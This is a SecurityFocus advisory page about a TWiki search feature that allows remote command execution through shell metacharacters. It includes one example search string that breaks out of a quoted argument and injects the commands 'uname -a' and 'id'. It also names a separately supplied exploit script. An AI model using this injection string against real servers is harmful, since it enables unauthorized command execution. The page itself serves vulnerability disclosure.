Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

TWiki Search Shell Metacharacter Remote Arbitrary Command Execution Vulnerability

An exploit is not required.

The following examples are available:
doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2

runvirus has supplied the exploit code Twiki-20030201-exec.pl.







 

Privacy Statement
Copyright 2008, SecurityFocus